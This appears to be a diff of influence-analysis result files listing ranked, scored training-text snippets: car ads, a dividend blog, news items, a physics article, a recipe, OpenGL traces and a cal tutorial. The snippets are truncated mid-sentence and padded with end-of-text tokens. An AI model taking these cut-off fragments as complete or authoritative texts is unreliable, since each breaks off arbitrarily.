Rating: (31 reviews) "Very responsive and honest. Although I didn't purchase a vehicle from them, I will always review their inventory for a possible vehicle purchase in the future." + +https://static.cargurus.com/images/forsale/2019/02/01/10/33/2002_honda_s2000-pic-5448988047155816041-152x114.jpeg 2002 Honda S2000 Roadster Used Cars in Fargo, ND 58103 Great Deal $3,883 BELOW CarGurus IMV of $19,817 Price: $15,934 Mileage: 45,589 Location: Fargo, ND 58103 Certified Pre-Owned: No Transmission: 6-Speed Manual Overdrive Color: Sebring Silver Metallic Description: Used 2002 Honda S2000 Roadster for sale - $15,934, 45,589 miles with Leather Seats, Alloy Wheels Avg. Dealer Rating: ( +================================================================================ +Rank = 87; Score = 790528.0 +<|begin_of_text|>Summary + +$328.00 in dividends + +Added $1,400 to dividend portfolio + +It’s been a great month for my dividend portfolio as I have added $1,400 to the investment account and received $328.00 in dividend payments for the month of June. This is a staggering amount and it’s the first time I can realize the power of dividend income and it’s ability to truly help someone live the passive income lifestyle. While I’m far off from achieving that goal it’s enough to keep the dream alive. + +Account Deposits + +I had some unexpected purchases this month so I was unable to put a large amount into my account like I did last month. That didn’t stop me from adding $1,400 this month though. + +I automatically pull out $200 per paycheck with automatic deposit and at the end of the month, I throw whatever is left into the account. This time it happened to be a spare $1k. + +$200 + $200 + $1000 = $1400 + +Dividend Payouts + +This has been an amazing month for my dividend producing portfolio. Twenty three companies paid me a piece of their profits just for holding a few shares of their stock. + +There was one surprise this month: + +NGG – They paid out a special dividend of $5.42/share this month that somehow got past my radar. They are a European based company so their dividend fluctuates quite a bit. They have their normal dividend coming in August as well. Their current yield is 10% with a PE ratio of just over 13. + +The rest of my dividends are broken down as follows: + +PSX $11.20 SBSI $11.20 PFE $5.12 F $11.40 BA $4.26 V $1.65 SO $12.76 NGG $54.22 XOM $6.93 TGT $12.00 IBM $9.00 SDIV $12.17 CVX $4.32 JNJ $8.40 MAIN $0.93 DUK $25.65 QCOM $18.24 FLO $25.50 MAIN $1.38 GILD $10.40 TROW $26.22 ARCC $38.00 CLDT $17.05 + +Monthly Total: $328.00 + +Stock Purchases + +I didn’t buy a whole lot this month but I did manage to add to a few positions on some dips. + +2 shares of CVX @ $103.15 + +CVX is still trying +================================================================================ +Rank = 88; Score = 790528.0 +<|begin_of_text|>Get ready to pay more for your Grand Slam. + +A Florida restaurateur who operates roughly 40 Denny’s locations and five Hurricane Grill & Wings franchises in Florida, Virginia and Georgia intends to add a 5 percent surcharge to customers’ bills to offset costs from ObamaCare beginning in January 2014 when the Affordable Care Act is fully implemented. + +“People are trying to find ways to avoid the penalties and to avoid having to pay for ObamaCare,” John Metz told FoxNews.com. “Everyone’s looking for a way to not have to provide insurance for their employees. It’s essentially a huge tax on all us business people.” + +To further offset the costs, Metz, who oversees roughly 1,200 employees as president and CEO of RREMC Restaurants, LLC, said he also will slash most of the staff's time to fewer than 30 hours per week. That change will be announced to employees next month, he said. + +“I want to explain it to everybody, to let them know what’s coming down the pike,” he said. “We like to keep our employees informed.” + +The changes will force some front-of-the-house employees to look for second jobs, Metz said, but he simply cannot afford the penalties associated with ObamaCare. + +[pullquote] + +“It’s a great concept,” he said. “We want to have everyone insured. The problem is, who is going to pay for it and how are we going to accomplish this?” + +Under the current law, employers with more than 50 full-time (or equivalent) workers will be charged a penalty for the number of employees exceeding 30 full-time staffers who are not covered. With an average of 35 full-time employees per location, Metz said the $2,000 penalty would total roughly $70,000 per restaurant. Current coverage costs Metz up to $6,000 annually per full-time employee, he said. He currently provides coverage to about 250 employees. + +“It’s going to be a big issue for all of us — for my employees and for me,” said Metz, who has been in the industry since 1975. “The ones that are working more than 28 hours, they’re going to act as if I’m cutting their hours and they’ll have to find another job.” + +At Denny’s restaurants operated by Metz, the average check is $9, he said, meaning the ObamaCare surcharge if implemented would be 45 cents on that bill. At Hurricane Grill & Wings locations, where the average bill +================================================================================ +Rank = 89; Score = 790528.0 +<|begin_of_text|>How many atoms are there in a kilogram of silicon? This number is Avogadro’s constant and working out its value is one of the more important tasks that materials scientists face. + +Today, a group of physicists reveal the answer. They say there are 6.02214084(18) × 10^23 atoms in a single crystal of silicon weighing about a kilogram. And they say they know this is right because they’ve counted them. Yep, counted them. + +Actually, they counted the number of atoms in a unit volume of silicon and measured the size of this volume. The number of times this fits into a lump of exactly 1 mole of near perfect single crystal sphere of silicon is Avogadro’s number. + +To have established this number to such accuracy is clearly an important piece of work but just how impressive is put in perspective by the monumental efforts of the international consortium behind it. + +The work began in 2004 when a Russian group created a sample of silicon flouride with a specific isotopic content at the Central Design Bureau of Machine Building in St. Petersburg. A team at the Institute of Chemistry of High-Purity Substances of the Russian Academy of Sciences in Nizhny-Novgorod then turned this into a polycrystal of silicon hydride which a group at the Leibniz-Institut fur Kristallzuchtung in Berlin used to grow a 5kg lump of pure monocrystalline silicon in 2007. + +The Australian Centre for Precision Optics then took samples from this lump and shaped them into quasi-perfect spheres. They then made an x-ray interferometer from the left over silicon to determine its crystal structure. They also measured crystals’ surfaces to see what kind of crud had built up there and would therefore have to be taken into account in the final calculations. (Various copper, nickel and silicon oxides had built up on the surface.) + +Various groups then measured the mass of the spheres by comparing them to the platinum-iridium test kilograms owned by the PTB (Physikalisch-Technische Bundesanstalt) in Germany, the National Metrology Institute of Japan in Tskuba and the Bureau International des Poids et Mesures in France. + +The team then measured the volume of the spheres using optical interferometry. And the isotope content was measured by teams at the University of Warsaw, the Institute of Mineral Resources of the Chinese Academy of Science and Institute for Physics of Microstructures of the Russian Academy of Sciences. + +Finally, the number of +================================================================================ +Rank = 90; Score = 786432.0 +<|begin_of_text|>Bucharest City Hall has 860 employees, Berlin City Hall has 207 + +Bucharest City Hall has a large apparatus compared to other big cities in Europe. + +It has 860 employees, and 10 mayor’s personal advisers for a population of 1.88 million people on a surface of 228 square kilometers. By comparison, Berlin has 207 employees, at a population of 3.46 million on an area of 891 sq km, according to data from the National Council of Small and Medium-Sized Companies in Romania (CNIPMMR). + +The council has been critical of the Bucharest City Hall’s plan to create 19 public service companies that will be controlled by the municipality. + +CNIPMMR representatives explained that in other EU member states the local authorities normally set up a small number of companies in uncompetitive, subsidized areas. In Vienna, for example, there are three municipal companies, at a number of 2.26 million inhabitants on an area of 414 sq km. Madrid has seven municipal companies at a population of 3.16 million on an area of 605 sq km. + +One week ago, the General Council of Bucharest City Hall approved the creation of 19 companies managed by the City Hall that will provide services in energy, public lighting, hospital administration, sports facilities, tourist attractions. + +editor@romania-insider.com<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 91; Score = 786432.0 +<|begin_of_text|>UHD is dead. Not really, but it would seem that displays bigger than UHD/4K will soon be coming to market. The ability of being able to stitch two regular sized outputs into the same panel is now being exploited even more as Dell has announced during its Modern Workforce livestream about the new ‘5K’ Ultrasharp 27-inch display. The ‘5K’ name comes from the 5120 pixels horizontally, but this panel screams as being two lots of 2560x2880 in a tiled display. + +5120x2880 at 27 inches comes out at 218 PPI for a total of 14.7 million pixels. At that number of pixels per inch, we are essentially looking at a larger 15.4-inch Retina MBP or double a WQHD ASUS Zenbook UX301, and seems right for users wanting to upgrade their 13 year old IBM T220 for something a bit more modern. + +Displays Sorted by PPI Product Size / in Resolution PPI Pixels LG G3 5.5 2560x1440 534 3,686,400 Samsung Galaxy S5 5.1 1920x1080 432 2,073,600 HTC One Max 5.9 1920x1080 373 2,073,600 Apple iPhone 5S 4 640x1136 326 727,040 Apple iPad mini Retina 7.9 2048x1536 324 2,777,088 Google Nexus 4 4.7 1280x768 318 983,040 Google Nexus 10 10 2560x1600 300 4,096,000 Lenovo Yoga 2 Pro 13.3 3200x1800 276 5,760,000 ASUS Zenbook UX301A 13.3 2560x1440 221 3,686,400 Apple Retina MBP 15" 15.4 2880x1800 221 5,184,000 Dell Ultrasharp 27" 5K 27 5120x2880 218 14,745,600 Nokia Lumia 820 4.3 800x480 217 384,000 IBM T220/T221 22.2 3840x2400 204 9,216,000 Dell UP2414Q 24 3840x2160 184 8, +================================================================================ +Rank = 92; Score = 786432.0 +<|begin_of_text|>1 banana + +2 eggs + +What could be better then pancakes? 2 Ingredient Banana Pancakes. These 2 ingredient banana pancakes are so simple and delicious. You’ve probably seen this recipe floating around the internet for quite some time now, I figured I better jump on the pancake bandwagon. I’m glad I did, and you’ll be glad too! + +Directions for 2 Ingredient Banana Pancakes + +All you need to make these amazing, delicious pancakes is a very ripe banana and 2 eggs. Throw it all in a blender (minus the shells and peel of course) and give it a whiz. Cook your pancakes just like a regular pancake! When they start to bubble it’s time to flip them! + +The beautiful thing about these 2 ingredient banana pancakes is that they are so versatile. You can top them with butter and syrup, peanut butter, chocolate chips, berries – the pancakes are your oyster. Wait, gross. You know what I mean. + +I chose to top mine with banana coins and melted peanut butter. These pancakes taste so delicious it’s hard to believe they aren’t loaded with sugar. + +How about dem photography skills? I’m getting better! I finally discovered what those fancy symbols on my camera do. It’s a work in progress, but I absolutely love my camera. If anyone is interested I use this camera: Nikon D3100 14.2MP Digital SLR Camera with 18-55mm f/3.5-5.6 AF-S DX VR Nikkor Zoom Lens + +If you are banana lover make sure you check out my Blueberry Banana Smoothie Recipe as well! Thanks for reading! Make sure to let me know what you think of these amazing 2 ingredient banana pancakes! Have you tried them before? How did they turn out!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 93; Score = 782336.0 +<|begin_of_text|>A 31 year old file-sharer escaped prison this morning when he received a heavy fine and a suspended sentence for uploading music and movies. The court refrained from putting the defendant in prison, saying that the music industry needs to take some responsibility for the current situation. + +After a retrial, a 31 year old man from Linköping, Sweden, was found guilty this morning in the District Court. + +The court decided that for uploading 4,500 music tracks and 30 movies with the filesharing application Direct Connect, the defendant should receive a heavy fine and a suspended prison sentence. Initially the file-sharer had been accused of uploading around 23,000 music tracks, but Sweden’s Anti-Piracy Agency’s (APB) use of questionable investigative techniques forced the prosecutor to withdraw some of the charges. + +In its verdict, the Linköping District Court decided that due to the large number of files involved in the case, handing out just fines wasn’t enough, hence the suspended sentence. This situation of sharing many thousands of files at once affects the BitTorrent user a lot less than those using other methods of sharing, which is probably why the music industry prefers to target users using ‘folder sharing’ clients, such as DirectConnect, LimeWire and KaZaA. + +Thankfully, the court denied the prosecutor’s request to have the man thrown in prison and said that this is “a task for the government, that by legislative means or in other ways take the necessary actions” to come to a solution to the problem. In fact, the court implied that the reason it issued only a suspended sentence was because the copyright industry has to take some responsibility for the situation it finds itself in. + +Although escaping prison would’ve been his number one aim, the fine received by the file-sharer will hurt. In Sweden there is a system of “day fines” that is regulated by how large an income the guilty party has. In the case of day fines, two figures are given, for example ’40 day fines of 50 kronor’ (that is to say, 2000 kronor). The first figure shows how seriously the court considers the offense (culpability) and the latter figure is determined depending on the accused’s financial situation. + +He was given 40 day fines, amounting to some 10000 kronor ($1650) and must also pay the court costs of 44670 kronor ($7360). + +Minister of Justice, Beatrice Ask, doesn’t want to comment on whether she +================================================================================ +Rank = 94; Score = 761856.0 +<|begin_of_text|>$\begingroup$ + +Hmm, if we look at $g(x) = f(f(x)) = x^2-2$ and find the fixpoints $t_0=-1,t_1=2$ then we might assume a solution $h(x)$ for $g(x) = h(x-2)+2 $ and then from this we search for the half-iterate of $h(x)$ defining $h(x-2)+2 = w(w(x-2))+2$ and shall have a solution of the problem by $f(x)=w(x+2)-2$, hopefully having nonzero range of convergence at least in the vicinity of the fixpoint $t_1$. + +With this ansatz we find that $$h(x) = g(x+2)-2 = (x+2)^2-4 = 4x+1x^2$$ could be a replacement for $g(x)$ and from this we get the leading terms for the power series of its half-iterate $$w(x) = 2 x + 1/6 x^2 - 1/90 x^3 + 1/720 x^4 - 7/32400 x^5 \\ + 161/4276800 x^6 - 391/55598400 x^7 + O(x^8) $$ by standard algebraic manipulations. (To check this insert $w(x)$ for $x$ in that leading terms) + +Thus $f(x)$ can be written as a power series around (fixpoint) $2$: $$f(x) = 2+ 2 (x-2) + 1/6 (x-2)^2 - 1/90 (x-2)^3 + 1/720 (x-2)^4 - 7/32400 (x-2)^5 \\ + 161/4276800 (x-2)^6 - 391/55598400 (x-2)^7 + O(x^8) $$ (The link gives a confirmation using WolframAlpha and a $\cosh()$ /$\text{arccosh}()$-formula, see my other answer) + +By the first $64$ terms it looks as if $w(x)$ has a positive range of convergence; and computing a couple of examples gives $$ \begin{array} {c|c|c|c} x &g(x)=h(1-t_1)+t_1 & f(x) = w +================================================================================ +Rank = 95; Score = 737280.0 +<|begin_of_text|>In fiscal year 2015, BC Hydro paid $1.064 billion to independent power producers (IPPs), an average of 7.9¢ a KWh. + +In fiscal year 2016, BC Hydro paid $1.229 billion to independent power producers and, in the quarter ended March 31 2016, it paid 9.8¢ a KWh, a 23% increase of the unit cost in the preceding fiscal year. + +In fiscal year 2015, BC Hydro sold electricity to Alberta and Western USA for $775 million, netting an average of 3.5¢ a KWh. + +In fiscal year 2016, BC Hydro sold electricity to Alberta and Western USA for $460 million, netting an average of 3.1¢ a KWh, a 14% decrease in the unit cost in the preceding fiscal year. + +Had IPP’s sold their power for the same price that BC Hydro realized in trade markets, they would have realized: + +In FY 2015, $591 million less ; + +; In FY 2016, $782 million less. + +The deals will get better for IPPs. BC Hydro’s website now announces that it has contracted for 19,290 GWh from these private producers. That is 35% more than purchases in the just completed fiscal year and follows an established trend. + +The chart is prepared from annual sales reports issued by BC Hydro. This shows the total sales to the utility’s three main customers groups: residential, commercial and heavy industrial. + +This entire subject is not one that BC Liberals like to discuss. I’m told they have BC Hydro working on a revised demand forecast and have had major problems trying to force square pegs into round holes. Even without Site C, it would be impossible to justify further purchases from private power producers. If BC Hydro continues dumping power on external trade markets, prices will be reduced to even lower levels. + +That outcome will make expensive Site C power an even bigger financial disaster.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 96; Score = 737280.0 +<|begin_of_text|>eglCreateContext ( version = 1, context = 0 ) + +eglMakeCurrent ( context = 0 ) + +glGetIntegerv ( pname = GL_MAX_TEXTURE_SIZE, params = [ 2048 ] ) + +glGetIntegerv ( pname = GL_MAX_TEXTURE_SIZE, params = [ 2048 ] ) + +glGetString ( name = GL_VERSION ) = OpenGL ES 2.0 14.01003 + +glGetIntegerv ( pname = GL_MAX_TEXTURE_SIZE, params = [ 2048 ] ) + +glGenBuffers ( n = 1, buffers = [ 1 ] ) + +glBindBuffer ( target = GL_ARRAY_BUFFER, buffer = 1 ) + +glBufferData ( target = GL_ARRAY_BUFFER, size = 64, data = [ 64 bytes ], + +usage = GL_STATIC_DRAW ) + +glDisable ( cap = GL_SCISSOR_TEST ) + +glActiveTexture ( texture = GL_TEXTURE0 ) + +glGenBuffers ( n = 1, buffers = [ 2 ] ) + +glBindBuffer ( target = GL_ARRAY_BUFFER, buffer = 2 ) + +glBufferData ( target = GL_ARRAY_BUFFER, size = 131072, data = 0x0, + +usage = GL_DYNAMIC_DRAW ) + +glGetIntegerv ( pname = GL_MAX_COMBINED_TEXTURE_IMAGE_UNITS, + +params = [ 16 ] ) + +glGetIntegerv ( pname = GL_MAX_TEXTURE_SIZE, params = [ 2048 ] ) + +glGenTextures ( n = 1, textures = [ 1 ] ) + +glBindTexture ( target = GL_TEXTURE_2D, texture = 1 ) + +glEGLImageTargetTexture2DOES ( target = GL_TEXTURE_2D, + +image = 2138532008 ) + +glGetError ( void ) = ( GLenum ) GL_NO_ERROR + +glDisable ( cap = GL_DITHER ) + +glClearColor ( red = 0, 000000, green = 0, 000000, blue = 0, 000000, + +alpha = 0, 000000 ) + +glEnableVertexAttribArray ( index = 0 ) + +glDisable ( cap = GL_BLEND ) + +glGenTextures ( n = 1, textures = [ 2 ] ) + +glBindTexture ( target = GL_TEXTURE_2D, texture = 2 ) + +glPixelStorei ( pname = GL_UNPACK_ALIGNMENT, param = 1 ) + +glTexImage2D ( target = GL_TEXTURE_2D, level = 0, + +internalformat = GL_ALPHA, width = 1024, height = 512, + +border +================================================================================ +Rank = 97; Score = 729088.0 +<|begin_of_text|>When bottles of + +'s new Engel Weisse hit shelves in late July, the German-style brew will have the lowest alcohol content of any Colorado beer sold in a liquor store -- 4 percent ABV, or 3.2 percent alcohol by weight. + +Continue Reading + +And it would have been much lower, between 2.5 and 3.4 percent ABV, if Elevation hadn't received a couple of reminders about a controversial rule that forbids liquor stores from selling low-alcohol beers, those that weigh in at under 4 percent ABV. + +See also: - Ten new Colorado craft beers to look for in July - Beer here! John Hickenlooper will sign Senate Bill 60 at 3 p.m. today at Old Chicago - Light beer ban at restaurants to be lifted?: Last chance for Colorado to see the light + +"We took a deeper look into the law and talked to some of our distributors and some retail outlets...and decided to change the recipe a little bit," says Elevation spokesman Xandy Bustamante. "The difference in taste is very, very minimal." + +The beer is a traditional German-style Berliner weisse, meaning it has crisp, sour notes that make it good for hot-weather drinking. Elevation aged its version in second-use whiskey barrels that have been washed so that they impart more of the oak flavors. + +In Germany, these unfiltered wheat-based beers are served with sweet syrups, like raspberry and woodruff; Elevation will do the same in its Poncha Springs taproom. + +"We wanted to do something sour for a long time, and we decided that we specifically wanted to make a Berliner weisse because it's an everyday sour, and one that you can have a couple of because it's low in alcohol," Bustamante says. + +Originally, Elevation planned to brew the beer at 2.5 percent ABV, which would have made it around the same alcohol content as similar beers in Germany, and then it moved it up to 3.4 percent. The brewery even made a batch of Engel Weisse at that ABV -- before realizing that the alcohol content was still too low to be legally sold in liquor stores. + +"We were disappointed when we had to change it," Bustamante says. "But since draft accounts and liquor stores are 100 percent of our business, we adjusted the recipe." + +The change was forced by a Colorado Department of Revenue rule that received a lot of attention in 2010 and 2011 amid the ongoing +================================================================================ +Rank = 98; Score = 729088.0 +<|begin_of_text|>Friday the 13th in a calendar + +Friday the 13th is considered an unlucky day in Western superstition. It occurs when the 13th day of the month in the Gregorian calendar falls on a Friday, which happens at least once every year but can occur up to three times in the same year, for example in 2015, on 13 February, 13 March and 13 November. In 2017, it occurred twice, on 13 January and 13 October. In 2018, it also occurred twice, on 13 April and 13 July. There will be two Friday the 13ths every year until 2020; 2021 and 2022 will have just one occurrence each. + +A Friday the 13th occurs during any month that begins on a Sunday. + +History + +The fear of the number 13 has been given a scientific name: "triskaidekaphobia"; and on analogy to this the fear of Friday the 13th is called paraskevidekatriaphobia, from the Greek words Paraskeví (Παρασκευή, meaning "Friday"), and dekatreís (δεκατρείς, meaning "thirteen").[3] + +The Last Supper by Leonardo da Vinci by Leonardo da Vinci + +The superstition surrounding this day may have arisen in the Middle Ages, "originating from the story of Jesus' last supper and crucifixion" in which there were 13 individuals present in the Upper Room on the 13th of Nisan Maundy Thursday, the night before his death on Good Friday.[4][5] While there is evidence of both Friday[6] and the number 13 being considered unlucky, there is no record of the two items being referred to as especially unlucky in conjunction before the 19th century.[7][8][9] + +An early documented reference in English occurs in Henry Sutherland Edwards' 1869 biography of Gioachino Rossini, who died on a Friday 13th: + +He [Rossini] was surrounded to the last by admiring friends; and if it be true that, like so many Italians, he regarded Fridays as an unlucky day and thirteen as an unlucky number, it is remarkable that on Friday 13th of November he passed away.[10] + +It is possible that the publication in 1907 of Thomas W. Lawson's popular novel Friday, the Thirteenth,[11] contributed to disseminating the superstition. In the novel, an unscrupulous broker +================================================================================ +Rank = 99; Score = 729088.0 +<|begin_of_text|>cal - Display a Calendar in Your Terminal 2016-05-09 — 2072 Words — 14 min + +This is my first post in the Command Line Monday series. It gives a short introduction to a useful command line tool every Monday. + +cal is part of the Single UNIX Specification and is should therefore be installed on every unix-like operating system. + +The official manual of cal in the unix specification defines only 3 commands: + +$ cal May 2016 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 + +$ cal 2015 2015 January February March Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa 1 2 3 1 2 3 4 5 6 7 1 2 3 4 5 6 7 4 5 6 7 8 9 10 8 9 10 11 12 13 14 8 9 10 11 12 13 14 11 12 13 14 15 16 17 15 16 17 18 19 20 21 15 16 17 18 19 20 21 18 19 20 21 22 23 24 22 23 24 25 26 27 28 22 23 24 25 26 27 28 25 26 27 28 29 30 31 29 30 31 April May June Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa 1 2 3 4 1 2 1 2 3 4 5 6 5 6 7 8 9 10 11 3 4 5 6 7 8 9 7 8 9 10 11 12 13 12 13 14 15 16 17 18 10 11 12 13 14 15 16 14 15 16 17 18 19 20 19 20 diff --git a/examples/openwebtext/files/scores_raw_margin/ml.txt b/examples/openwebtext/files/scores_raw_margin/ml.txt new file mode 100644 index 0000000..0ce8aeb --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/ml.txt @@ -0,0 +1,2280 @@ +Query Sequence: +Prompt:Machine learning can be defined as; Completion: a set of algorithms that enables computers to learn from data. These algorithms are used to build models that can be used for various tasks, such as predicting the future, identifying patterns, and making decisions. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 65536000.0 +<|begin_of_text|>Energy development is the field of activities focused on obtaining sources of energy from natural resources. These activities include production of conventional, alternative and renewable sources of energy, and for the recovery and reuse of energy that would otherwise be wasted. Energy conservation and efficiency measures reduce the demand for energy development, and can have benefits to society with improvements to environmental issues. + +Societies use energy for transportation, manufacturing, illumination, heating and air conditioning, and communication, for industrial, commercial, and domestic purposes. Energy resources may be classified as primary resources, where the resource can be used in substantially its original form, or as secondary resources, where the energy source must be converted into a more conveniently usable form. Non-renewable resources are significantly depleted by human use, whereas renewable resources are produced by ongoing processes that can sustain indefinite human exploitation. + +Thousands of people are employed in the energy industry. The conventional industry comprises the petroleum industry, the natural gas industry, the electrical power industry, and the nuclear industry. New energy industries include the renewable energy industry, comprising alternative and sustainable manufacture, distribution, and sale of alternative fuels. + +Classification of resources [ edit ] + +Open System Model (basics) + +Energy resources may be classified as primary resources, suitable for end use without conversion to another form, or secondary resources, where the usable form of energy required substantial conversion from a primary source. Examples of primary energy resources are wind power, solar power, wood fuel, fossil fuels such as coal, oil and natural gas, and uranium. Secondary resources are those such as electricity, hydrogen, or other synthetic fuels. + +Another important classification is based on 